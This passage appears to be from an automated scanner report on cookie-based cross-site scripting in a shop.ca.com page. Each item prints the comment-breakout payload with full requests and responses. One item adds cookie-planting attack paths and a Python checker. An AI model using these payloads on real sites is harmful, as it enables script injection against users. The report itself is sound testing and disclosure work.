...[SNIP]...

4.297. http://shop.ca.com/applications/email/d_subscribe.asp [IS3_GSV cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://shop.ca.com
Path:   /applications/email/d_subscribe.asp

Issue detail

The value of the IS3_GSV cookie is copied into an HTML comment. The payload 87dd2--><script>alert(1)</script>b6b9a57e245 was submitted in the IS3_GSV cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /applications/email/d_subscribe.asp HTTP/1.1
Host: shop.ca.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SessionId=1310349220110417085445173193214243; __utmz=36441954.1303044886.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); Order=orderTotal=; DB=msImageSC=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F620x150C%2Ejpg&Survey=1&msImageID=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F430x150C%2Ejpg&msProduct=1782427&msRandX=93; Cart=PHPromo=N&Referer=&Landing=http%3A%2F%2Fshop%2Eca%2Ecom%2Fca%2Fresources%2Fresources%2Easp; CoreID6=81872050743513030451330&ci=; beta=Y; SRCCODE=CAWEB; SRVR=WEBX140%2D01C; IS3_History=1301114230-2-91_0--2__0_0; IS3_GSV=DPL-2_TES-1303045130_PCT-1303045130_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com87dd2--><script>alert(1)</script>b6b9a57e245; __utma=36441954.679833155.1303044886.1303044886.1303044886.1; __utmc=36441954; __utmb=36441954.3.10.1303044886; _clogin=l=1303045133&v=7&e=1303046939452;

Response (redirected)

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-SV: MIAWEB01C
X-Powered-By: ASP.NET
Content-Length: 9505
Content-Type: text/html
Cache-Control: private
Date: Sun, 17 Apr 2011 13:04:48 GMT
Connection: close
Set-Cookie: SRVR=WEBX140%2D01C; path=/
Set-Cookie: DB=msRandX=93&msProduct=1782427&Sidenav=B&msImageID=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F430x150C%2Ejpg&Survey=1&msImageSC=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F620x150C%2Ejpg; path=/
Set-Cookie: beta=Y; path=/
Set-Cookie: SRCCODE=CAWEB; expires=Tue, 17-May-2011 04:00:00 GMT; path=/


<html>
<head>

<TITLE>shop.ca.com - Invalid Email</TITLE>
<meta name="Author" content="TigerDirect, Inc. Web Development Team">
<meta name="copyright" content=". 2003 TigerDirect, Inc. All righ
...[SNIP]...
<!--IS3_GSV :DPL-2_TES-1303045130_PCT-1303045130_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com87dd2--><script>alert(1)</script>b6b9a57e245-->
...[SNIP]...

4.298. http://shop.ca.com/applications/email/d_subscribe.asp [IS3_History cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://shop.ca.com
Path:   /applications/email/d_subscribe.asp

Issue detail

The value of the IS3_History cookie is copied into an HTML comment. The payload f0b71--><script>alert(1)</script>03cb65b912f was submitted in the IS3_History cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /applications/email/d_subscribe.asp HTTP/1.1
Host: shop.ca.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SessionId=1310349220110417085445173193214243; __utmz=36441954.1303044886.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); Order=orderTotal=; DB=msImageSC=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F620x150C%2Ejpg&Survey=1&msImageID=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F430x150C%2Ejpg&msProduct=1782427&msRandX=93; Cart=PHPromo=N&Referer=&Landing=http%3A%2F%2Fshop%2Eca%2Ecom%2Fca%2Fresources%2Fresources%2Easp; CoreID6=81872050743513030451330&ci=; beta=Y; SRCCODE=CAWEB; SRVR=WEBX140%2D01C; IS3_History=1301114230-2-91_0--2__0_0f0b71--><script>alert(1)</script>03cb65b912f; IS3_GSV=DPL-2_TES-1303045130_PCT-1303045130_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; __utma=36441954.679833155.1303044886.1303044886.1303044886.1; __utmc=36441954; __utmb=36441954.3.10.1303044886; _clogin=l=1303045133&v=7&e=1303046939452;

Response (redirected)

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-SV: MIAWEB01C
X-Powered-By: ASP.NET
Content-Type: text/html
Cache-Control: private
Date: Sun, 17 Apr 2011 13:04:48 GMT
Content-Length: 9505
Connection: close
Set-Cookie: SRVR=WEBX140%2D01C; path=/
Set-Cookie: DB=msRandX=93&msProduct=1782427&Sidenav=A&msImageID=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F430x150C%2Ejpg&Survey=1&msImageSC=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F620x150C%2Ejpg; path=/
Set-Cookie: beta=Y; path=/
Set-Cookie: SRCCODE=CAWEB; expires=Tue, 17-May-2011 04:00:00 GMT; path=/


<html>
<head>

<TITLE>shop.ca.com - Invalid Email</TITLE>
<meta name="Author" content="TigerDirect, Inc. Web Development Team">
<meta name="copyright" content=". 2003 TigerDirect, Inc. All righ
...[SNIP]...
<!--IS3_History :1301114230-2-91_0--2__0_0f0b71--><script>alert(1)</script>03cb65b912f-->
...[SNIP]...

4.299. http://shop.ca.com/applications/email/d_subscribe.asp [Order cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://shop.ca.com
Path:   /applications/email/d_subscribe.asp

Issue detail

The value of the Order cookie is copied into an HTML comment. The payload e64a7--><script>alert(1)</script>c02a91f6745 was submitted in the Order cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /applications/email/d_subscribe.asp HTTP/1.1
Host: shop.ca.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SessionId=1310349220110417085445173193214243; __utmz=36441954.1303044886.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); Order=orderTotal=e64a7--><script>alert(1)</script>c02a91f6745; DB=msImageSC=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F620x150C%2Ejpg&Survey=1&msImageID=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F430x150C%2Ejpg&msProduct=1782427&msRandX=93; Cart=PHPromo=N&Referer=&Landing=http%3A%2F%2Fshop%2Eca%2Ecom%2Fca%2Fresources%2Fresources%2Easp; CoreID6=81872050743513030451330&ci=; beta=Y; SRCCODE=CAWEB; SRVR=WEBX140%2D01C; IS3_History=1301114230-2-91_0--2__0_0; IS3_GSV=DPL-2_TES-1303045130_PCT-1303045130_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; __utma=36441954.679833155.1303044886.1303044886.1303044886.1; __utmc=36441954; __utmb=36441954.3.10.1303044886; _clogin=l=1303045133&v=7&e=1303046939452;

Response (redirected)

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-SV: MIAWEB01C
X-Powered-By: ASP.NET
Content-Length: 9505
Content-Type: text/html
Cache-Control: private
Date: Sun, 17 Apr 2011 13:04:44 GMT
Connection: close
Set-Cookie: SRVR=WEBX140%2D01C; path=/
Set-Cookie: DB=msRandX=93&msProduct=1782427&Sidenav=A&msImageID=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F430x150C%2Ejpg&Survey=1&msImageSC=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F620x150C%2Ejpg; path=/
Set-Cookie: beta=Y; path=/
Set-Cookie: SRCCODE=CAWEB; expires=Tue, 17-May-2011 04:00:00 GMT; path=/


<html>
<head>

<TITLE>shop.ca.com - Invalid Email</TITLE>
<meta name="Author" content="TigerDirect, Inc. Web Development Team">
<meta name="copyright" content=". 2003 TigerDirect, Inc. All righ
...[SNIP]...
<!--Order(orderTotal) :e64a7--><script>alert(1)</script>c02a91f6745-->
...[SNIP]...

4.300. http://shop.ca.com/applications/email/d_subscribe.asp [SessionId cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://shop.ca.com
Path:   /applications/email/d_subscribe.asp

Issue detail

The value of the SessionId cookie is copied into an HTML comment. The payload 89285--><script>alert(1)</script>4c3b13506ed was submitted in the SessionId cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /applications/email/d_subscribe.asp HTTP/1.1
Host: shop.ca.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SessionId=131034922011041708544517319321424389285--><script>alert(1)</script>4c3b13506ed; __utmz=36441954.1303044886.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); Order=orderTotal=; DB=msImageSC=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F620x150C%2Ejpg&Survey=1&msImageID=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F430x150C%2Ejpg&msProduct=1782427&msRandX=93; Cart=PHPromo=N&Referer=&Landing=http%3A%2F%2Fshop%2Eca%2Ecom%2Fca%2Fresources%2Fresources%2Easp; CoreID6=81872050743513030451330&ci=; beta=Y; SRCCODE=CAWEB; SRVR=WEBX140%2D01C; IS3_History=1301114230-2-91_0--2__0_0; IS3_GSV=DPL-2_TES-1303045130_PCT-1303045130_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; __utma=36441954.679833155.1303044886.1303044886.1303044886.1; __utmc=36441954; __utmb=36441954.3.10.1303044886; _clogin=l=1303045133&v=7&e=1303046939452;

Response (redirected)

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-SV: MIAWEB01C
X-Powered-By: ASP.NET
Content-Type: text/html
Cache-Control: private
Date: Sun, 17 Apr 2011 13:04:42 GMT
Content-Length: 9505
Connection: close
Set-Cookie: SRVR=WEBX140%2D01C; path=/
Set-Cookie: DB=msRandX=93&msProduct=1782427&Sidenav=B&msImageID=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F430x150C%2Ejpg&Survey=1&msImageSC=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F620x150C%2Ejpg; path=/
Set-Cookie: beta=Y; path=/
Set-Cookie: SRCCODE=CAWEB; expires=Tue, 17-May-2011 04:00:00 GMT; path=/


<html>
<head>

<TITLE>shop.ca.com - Invalid Email</TITLE>
<meta name="Author" content="TigerDirect, Inc. Web Development Team">
<meta name="copyright" content=". 2003 TigerDirect, Inc. All righ
...[SNIP]...
<!--SessionId :131034922011041708544517319321424389285--><script>alert(1)</script>4c3b13506ed-->
...[SNIP]...

4.301. http://shop.ca.com/applications/email/d_subscribe.asp [__utma cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://shop.ca.com
Path:   /applications/email/d_subscribe.asp

Issue detail

The value of the __utma cookie is copied into an HTML comment. The payload 85b45--><script>alert(1)</script>7b497413ae3 was submitted in the __utma cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user: the attacker first needs a way to set the cookie in the victim's browser. In practice that means either a cookie-setting foothold on a sibling ca.com host (a cookie scoped to the parent domain is also sent to shop.ca.com) or an on-path position, since every request in this section is plain HTTP and any HTTP response can carry a Set-Cookie header. This limitation considerably mitigates the impact of the vulnerability. Note, however, that the response dumps each incoming cookie value into a debug comment (the `<!--__utma :...-->` line below), so one such foothold reaches every cookie-sourced sink on this page, and the breakout itself only needs the `-->` sequence, which nothing in the cookie handling strips.

Request

GET /applications/email/d_subscribe.asp HTTP/1.1
Host: shop.ca.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SessionId=1310349220110417085445173193214243; __utmz=36441954.1303044886.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); Order=orderTotal=; DB=msImageSC=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F620x150C%2Ejpg&Survey=1&msImageID=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F430x150C%2Ejpg&msProduct=1782427&msRandX=93; Cart=PHPromo=N&Referer=&Landing=http%3A%2F%2Fshop%2Eca%2Ecom%2Fca%2Fresources%2Fresources%2Easp; CoreID6=81872050743513030451330&ci=; beta=Y; SRCCODE=CAWEB; SRVR=WEBX140%2D01C; IS3_History=1301114230-2-91_0--2__0_0; IS3_GSV=DPL-2_TES-1303045130_PCT-1303045130_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; __utma=36441954.679833155.1303044886.1303044886.1303044886.185b45--><script>alert(1)</script>7b497413ae3; __utmc=36441954; __utmb=36441954.3.10.1303044886; _clogin=l=1303045133&v=7&e=1303046939452;

Response (redirected)

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-SV: MIAWEB01C
X-Powered-By: ASP.NET
Content-Type: text/html
Cache-Control: private
Date: Sun, 17 Apr 2011 13:04:49 GMT
Content-Length: 9505
Connection: close
Set-Cookie: SRVR=WEBX140%2D01C; path=/
Set-Cookie: DB=msRandX=93&msProduct=1782427&Sidenav=A&msImageID=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F430x150C%2Ejpg&Survey=1&msImageSC=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F620x150C%2Ejpg; path=/
Set-Cookie: beta=Y; path=/
Set-Cookie: SRCCODE=CAWEB; expires=Tue, 17-May-2011 04:00:00 GMT; path=/


<html>
<head>

<TITLE>shop.ca.com - Invalid Email</TITLE>
<meta name="Author" content="TigerDirect, Inc. Web Development Team">
<meta name="copyright" content=". 2003 TigerDirect, Inc. All righ
...[SNIP]...
<!--__utma :36441954.679833155.1303044886.1303044886.1303044886.185b45--><script>alert(1)</script>7b497413ae3-->
...[SNIP]...
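The check above can be reproduced offline. The following is an added example in Python (it is not part of the XSS.CX report or of Burp's output): it appends the probe to the named cookie exactly as the request above does, then scans a response body comment-aware to decide whether the injected `<script>` falls outside every HTML comment, which is the condition that turns a value echoed into a comment into executable script. `BASE_COOKIE` is a shortened copy of the request's Cookie header, `SAMPLE_BODY` is constructed from the response snippet above with the `...[SNIP]...` parts dropped, and the function names are this example's own.

```python
"""Added example: reproduce the cookie-in-HTML-comment check from issue 4.301 offline."""
import re

# Constructed from the request and response above; the "...[SNIP]..." parts are omitted.
BASE_COOKIE = (
    "SessionId=1310349220110417085445173193214243; "
    "__utma=36441954.679833155.1303044886.1303044886.1303044886.1; "
    "__utmc=36441954; __utmb=36441954.3.10.1303044886"
)
PAYLOAD = "85b45--><script>alert(1)</script>7b497413ae3"
SAMPLE_BODY = (
    "<html><head><title>shop.ca.com - Invalid Email</title></head><body>\n"
    "<!--__utma :36441954.679833155.1303044886.1303044886.1303044886.1"
    + PAYLOAD + "-->\n</body></html>"
)


def inject_cookie(cookie_header: str, name: str, payload: str) -> str:
    """Append payload to the value of one cookie, leaving the others untouched."""
    out, hit = [], False
    for item in cookie_header.split(";"):
        item = item.strip()
        if not item:
            continue
        key, _, val = item.partition("=")
        if key == name:
            val, hit = val + payload, True
        out.append(f"{key}={val}")
    if not hit:
        raise KeyError(f"cookie {name!r} not present in header")
    return "; ".join(out)


def live_script_tags(html: str) -> list:
    """Return the <script> elements a browser would actually execute.

    Walks the document left to right: "<!--" opens a comment and the FIRST
    "-->" closes it, so a "-->" smuggled in via a cookie ends the comment early
    and everything after it is parsed as markup again.
    """
    live, pos, in_comment = [], 0, False
    while pos < len(html):
        if in_comment:
            end = html.find("-->", pos)
            if end == -1:          # an unterminated comment swallows the rest
                break
            pos, in_comment = end + 3, False
            continue
        start = html.find("<!--", pos)
        segment = html[pos:] if start == -1 else html[pos:start]
        live += re.findall(r"<script\b[^>]*>.*?</script>", segment, re.I | re.S)
        if start == -1:
            break
        pos, in_comment = start + 4, True
    return live


def echoes_live_script(html: str, payload: str) -> bool:
    """True when the payload's <script> lands outside every comment in html."""
    m = re.search(r"<script\b[^>]*>.*?</script>", payload, re.I | re.S)
    return bool(m) and m.group(0) in live_script_tags(html)


if __name__ == "__main__":
    print(inject_cookie(BASE_COOKIE, "__utma", PAYLOAD))
    print("live scripts:", live_script_tags(SAMPLE_BODY))
    print("exploitable:", echoes_live_script(SAMPLE_BODY, PAYLOAD))
```

The comment-aware scan is what separates a real finding from a false positive: a response that echoed the payload with the `>` neutralised (for instance as `--&gt;`) would still contain the literal `<script>` text, but the scanner would correctly report no live script, because entities are not decoded inside comments and the comment never closes early.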

4.302. http://shop.ca.com/applications/email/d_subscribe.asp [__utmb cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://shop.ca.com
Path:   /applications/email/d_subscribe.asp

Issue detail

The value of the __utmb cookie is copied into an HTML comment. The payload 7b3db--><script>alert(1)</script>47a4f48e6e6 was submitted in the __utmb cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /applications/email/d_subscribe.asp HTTP/1.1
Host: shop.ca.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SessionId=1310349220110417085445173193214243; __utmz=36441954.1303044886.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); Order=orderTotal=; DB=msImageSC=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F620x150C%2Ejpg&Survey=1&msImageID=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F430x150C%2Ejpg&msProduct=1782427&msRandX=93; Cart=PHPromo=N&Referer=&Landing=http%3A%2F%2Fshop%2Eca%2Ecom%2Fca%2Fresources%2Fresources%2Easp; CoreID6=81872050743513030451330&ci=; beta=Y; SRCCODE=CAWEB; SRVR=WEBX140%2D01C; IS3_History=1301114230-2-91_0--2__0_0; IS3_GSV=DPL-2_TES-1303045130_PCT-1303045130_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; __utma=36441954.679833155.1303044886.1303044886.1303044886.1; __utmc=36441954; __utmb=36441954.3.10.13030448867b3db--><script>alert(1)</script>47a4f48e6e6; _clogin=l=1303045133&v=7&e=1303046939452;

Response (redirected)

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-SV: MIAWEB01C
X-Powered-By: ASP.NET
Content-Type: text/html
Cache-Control: private
Date: Sun, 17 Apr 2011 13:04:51 GMT
Content-Length: 9505
Connection: close
Set-Cookie: SRVR=WEBX140%2D01C; path=/
Set-Cookie: DB=msRandX=93&msProduct=1782427&Sidenav=A&msImageID=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F430x150C%2Ejpg&Survey=1&msImageSC=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F620x150C%2Ejpg; path=/
Set-Cookie: beta=Y; path=/
Set-Cookie: SRCCODE=CAWEB; expires=Tue, 17-May-2011 04:00:00 GMT; path=/


<html>
<head>

<TITLE>shop.ca.com - Invalid Email</TITLE>
<meta name="Author" content="TigerDirect, Inc. Web Development Team">
<meta name="copyright" content=". 2003 TigerDirect, Inc. All righ
...[SNIP]...
<!--__utmb :36441954.3.10.13030448867b3db--><script>alert(1)</script>47a4f48e6e6-->
...[SNIP]...

4.303. http://shop.ca.com/applications/email/d_subscribe.asp [__utmc cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://shop.ca.com
Path:   /applications/email/d_subscribe.asp

Issue detail

The value of the __utmc cookie is copied into an HTML comment. The payload 59e33--><script>alert(1)</script>09e1a43ff2c was submitted in the __utmc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /applications/email/d_subscribe.asp HTTP/1.1
Host: shop.ca.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SessionId=1310349220110417085445173193214243; __utmz=36441954.1303044886.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); Order=orderTotal=; DB=msImageSC=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F620x150C%2Ejpg&Survey=1&msImageID=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F430x150C%2Ejpg&msProduct=1782427&msRandX=93; Cart=PHPromo=N&Referer=&Landing=http%3A%2F%2Fshop%2Eca%2Ecom%2Fca%2Fresources%2Fresources%2Easp; CoreID6=81872050743513030451330&ci=; beta=Y; SRCCODE=CAWEB; SRVR=WEBX140%2D01C; IS3_History=1301114230-2-91_0--2__0_0; IS3_GSV=DPL-2_TES-1303045130_PCT-1303045130_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; __utma=36441954.679833155.1303044886.1303044886.1303044886.1; __utmc=3644195459e33--><script>alert(1)</script>09e1a43ff2c; __utmb=36441954.3.10.1303044886; _clogin=l=1303045133&v=7&e=1303046939452;

Response (redirected)

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-SV: MIAWEB01C
X-Powered-By: ASP.NET
Content-Length: 9505
Content-Type: text/html
Cache-Control: private
Date: Sun, 17 Apr 2011 13:04:49 GMT
Connection: close
Set-Cookie: SRVR=WEBX140%2D01C; path=/
Set-Cookie: DB=msRandX=93&msProduct=1782427&Sidenav=B&msImageID=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F430x150C%2Ejpg&Survey=1&msImageSC=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F620x150C%2Ejpg; path=/
Set-Cookie: beta=Y; path=/
Set-Cookie: SRCCODE=CAWEB; expires=Tue, 17-May-2011 04:00:00 GMT; path=/


<html>
<head>

<TITLE>shop.ca.com - Invalid Email</TITLE>
<meta name="Author" content="TigerDirect, Inc. Web Development Team">
<meta name="copyright" content=". 2003 TigerDirect, Inc. All righ
...[SNIP]...
<!--__utmc :3644195459e33--><script>alert(1)</script>09e1a43ff2c-->
...[SNIP]...

4.304. http://shop.ca.com/applications/email/d_subscribe.asp [__utmz cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://shop.ca.com
Path:   /applications/email/d_subscribe.asp

Issue detail

The value of the __utmz cookie is copied into an HTML comment. The payload 6bd45--><script>alert(1)</script>a403585bd9c was submitted in the __utmz cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /applications/email/d_subscribe.asp HTTP/1.1
Host: shop.ca.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SessionId=1310349220110417085445173193214243; __utmz=36441954.1303044886.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)6bd45--><script>alert(1)</script>a403585bd9c; Order=orderTotal=; DB=msImageSC=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F620x150C%2Ejpg&Survey=1&msImageID=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F430x150C%2Ejpg&msProduct=1782427&msRandX=93; Cart=PHPromo=N&Referer=&Landing=http%3A%2F%2Fshop%2Eca%2Ecom%2Fca%2Fresources%2Fresources%2Easp; CoreID6=81872050743513030451330&ci=; beta=Y; SRCCODE=CAWEB; SRVR=WEBX140%2D01C; IS3_History=1301114230-2-91_0--2__0_0; IS3_GSV=DPL-2_TES-1303045130_PCT-1303045130_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; __utma=36441954.679833155.1303044886.1303044886.1303044886.1; __utmc=36441954; __utmb=36441954.3.10.1303044886; _clogin=l=1303045133&v=7&e=1303046939452;

Response (redirected)

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-SV: MIAWEB01C
X-Powered-By: ASP.NET
Content-Type: text/html
Cache-Control: private
Date: Sun, 17 Apr 2011 13:04:43 GMT
Content-Length: 9505
Connection: close
Set-Cookie: SRVR=WEBX140%2D01C; path=/
Set-Cookie: DB=msRandX=93&msProduct=1782427&Sidenav=B&msImageID=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F430x150C%2Ejpg&Survey=1&msImageSC=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F620x150C%2Ejpg; path=/
Set-Cookie: beta=Y; path=/
Set-Cookie: SRCCODE=CAWEB; expires=Tue, 17-May-2011 04:00:00 GMT; path=/


<html>
<head>

<TITLE>shop.ca.com - Invalid Email</TITLE>
<meta name="Author" content="TigerDirect, Inc. Web Development Team">
<meta name="copyright" content=". 2003 TigerDirect, Inc. All righ
...[SNIP]...
<!--__utmz(36441954.1303:(direct)|utmccn=(direct)|utmcmd=(none)6bd45--><script>alert(1)</script>a403585bd9c-->
...[SNIP]...

4.305. http://shop.ca.com/applications/email/d_subscribe.asp [_clogin cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://shop.ca.com
Path:   /applications/email/d_subscribe.asp

Issue detail

The value of the _clogin cookie is copied into an HTML comment. The payload 3f4c2--><script>alert(1)</script>d1db291ccbd was submitted in the _clogin cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /applications/email/d_subscribe.asp HTTP/1.1
Host: shop.ca.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
